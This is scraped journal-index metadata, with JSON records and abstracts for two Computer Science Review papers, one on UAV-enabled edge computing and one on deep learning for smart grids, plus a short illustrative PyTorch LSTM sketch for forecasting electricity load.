{"title":"Fundamental design aspects of UAV-enabled MEC systems: A review on models, challenges, and future opportunities","authors":"Mohd Hirzi Adnan , Zuriati Ahmad Zukarnain , Oluwatosin Ahmed Amodu","doi":"10.1016/j.cosrev.2023.100615","DOIUrl":"https://doi.org/10.1016/j.cosrev.2023.100615","url":null,"abstract":"<div><p>The huge prospects of the internet of things (IoT) have led to an ever-growing demand for computing power by IoT users to enable various applications. Multi-access edge computing (MEC) research and development has rapidly gained attention during the last decade. The ability to deploy edge servers at different points across a content delivery network that can offer communication and computing services close to mobile user devices is one of the main factors driving the evolution of MEC. Furthermore, MEC has been considered a potentially transformational approach for fifth-generation (5 G) and beyond 5 G (B5G) networks, as well as a potential improvement to conventional cloud computing. Unmanned aerial vehicles (UAVs) can be used as effective aerial platforms to offer reliable and ubiquitous connections in wireless communication networks due to their distinctive qualities, such as high cruising altitude, on-demand deployment, and three-dimensional (3D) maneuverability. The number of research studies published in this area has dramatically increased due to the growing interest in UAV-enabled MEC. Although UAV-enabled MEC systems have been well studied, the existing models are becoming increasingly heterogeneous and scattered without harmony. This paper provides a comprehensive analysis of the literature on UAV-enabled MEC systems with a special focus on the system modeling, and optimization techniques for five identified domains, such as energy efficiency, resource allocation, trajectory control, latency, and security. For each domain, we have highlighted the recent advances, critical findings, and the advantages and disadvantages. Additionally, the identified proposed techniques were analyzed and discussed, with emphasize on the constraints and performance metrics. We also discuss a general system model for each highlighted domain. Moreover, the lessons are also derived from the study on system optimization and system modeling techniques identified in this paper. Then we discuss open issues related to UAV-enabled MEC systems in each highlighted domain, including problem formulation and optimization techniques. Finally, this paper lay out directions for future research to solve the aforementioned problems associated with UAV-enabled MEC systems.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-02-01","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"https://www.sciencedirect.com/science/article/pii/S1574013723000825/pdfft?md5=82077d59b65835005a3894d0bb65ba35&pid=1-s2.0-S1574013723000825-main.pdf","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"139699623","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"OA","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Deep learning for intelligent demand response and smart grids: A comprehensive survey
Pub Date: 2024-02-01 | DOI: 10.1016/j.cosrev.2024.100617
Prabadevi Boopathy, Madhusanka Liyanage, Natarajan Deepa, Mounik Velavali, Shivani Reddy, Praveen Kumar Reddy Maddikunta, Neelu Khare, Thippa Reddy Gadekallu, Won-Joo Hwang, Quoc-Viet Pham
Electricity is one of the mandatory commodities for mankind today. To address challenges and issues in the transmission of electricity through the traditional grid, the concepts of smart grids and demand response have been developed. In such systems, a large amount of data is generated daily from various sources, such as power generation (e.g., wind turbines), transmission and distribution (microgrids and fault detectors), and load management (smart meters and smart electric appliances). Thanks to recent advancements in big data and computing technologies, Deep Learning (DL) can be leveraged to learn patterns from the generated data and predict electricity demand and peak hours. Motivated by the advantages of deep learning in smart grids, this paper sets out to provide a comprehensive survey on the application of DL for intelligent smart grids and demand response. Firstly, we present the fundamentals of DL, smart grids, and demand response, and the motivation behind the use of DL. Secondly, we review the state-of-the-art applications of DL in smart grids and demand response, including electric load forecasting, state estimation, energy theft detection, and energy sharing and trading. Furthermore, we illustrate the practicality of DL via various use cases and projects. Finally, we discuss the challenges presented in existing research works and highlight important issues and potential directions in the use of DL for smart grids and demand response.
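To make the electric load forecasting application concrete, the following minimal PyTorch sketch, our illustration rather than a model from the survey, trains an LSTM to predict the next hour's demand from the previous 24 hours of a synthetic daily-cycle load series.

```python
# Short-term load forecasting sketch: an LSTM predicts the next hour's load
# from a 24-hour window. The sinusoidal "load" series and all hyperparameters
# are illustrative assumptions.
import math
import torch
import torch.nn as nn

t = torch.arange(0, 2000, dtype=torch.float32)
load = torch.sin(2 * math.pi * t / 24) + 0.1 * torch.randn(2000)  # daily cycle

window = 24
X = torch.stack([load[i:i + window] for i in range(len(load) - window)]).unsqueeze(-1)
y = load[window:].unsqueeze(-1)

class LoadForecaster(nn.Module):
    def __init__(self):
        super().__init__()
        self.lstm = nn.LSTM(input_size=1, hidden_size=32, batch_first=True)
        self.head = nn.Linear(32, 1)
    def forward(self, x):
        out, _ = self.lstm(x)          # (batch, window, hidden)
        return self.head(out[:, -1])   # predict from the last time step

model = LoadForecaster()
opt = torch.optim.Adam(model.parameters(), lr=1e-3)
for epoch in range(5):
    opt.zero_grad()
    loss = nn.functional.mse_loss(model(X), y)
    loss.backward(); opt.step()
    print(f"epoch {epoch}: mse={loss.item():.4f}")
```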
{"title":"Deep learning for intelligent demand response and smart grids: A comprehensive survey","authors":"Prabadevi Boopathy , Madhusanka Liyanage , Natarajan Deepa , Mounik Velavali , Shivani Reddy , Praveen Kumar Reddy Maddikunta , Neelu Khare , Thippa Reddy Gadekallu , Won-Joo Hwang , Quoc-Viet Pham","doi":"10.1016/j.cosrev.2024.100617","DOIUrl":"https://doi.org/10.1016/j.cosrev.2024.100617","url":null,"abstract":"<div><p>Electricity is one of the mandatory commodities for mankind today. To address challenges and issues in the transmission of electricity through the traditional grid, the concepts of smart grids and demand response have been developed. In such systems, a large amount of data is generated daily from various sources such as power generation (e.g., wind turbines), transmission and distribution (microgrids and fault detectors), load management (smart meters and smart electric appliances). Thanks to recent advancements in big data and computing technologies, Deep Learning (DL) can be leveraged to learn the patterns from the generated data and predict the demand for electricity and peak hours. Motivated by the advantages of deep learning in smart grids, this paper sets to provide a comprehensive survey on the application of DL for intelligent smart grids and demand response. Firstly, we present the fundamental of DL, smart grids, demand response, and the motivation behind the use of DL. Secondly, we review the state-of-the-art applications of DL in smart grids and demand response, including electric load forecasting, state estimation, energy theft detection, energy sharing and trading. Furthermore, we illustrate the practicality of DL via various use cases and projects. Finally, we highlight the challenges presented in existing research works and highlight important issues and potential directions in the use of DL for smart grids and demand response.</p></div>","PeriodicalId":48633,"journal":{"name":"Computer Science Review","volume":null,"pages":null},"PeriodicalIF":12.9,"publicationDate":"2024-02-01","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"https://www.sciencedirect.com/science/article/pii/S1574013724000017/pdfft?md5=37a2ff44234d359888c071095b8d9b65&pid=1-s2.0-S1574013724000017-main.pdf","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"139738725","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"OA","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}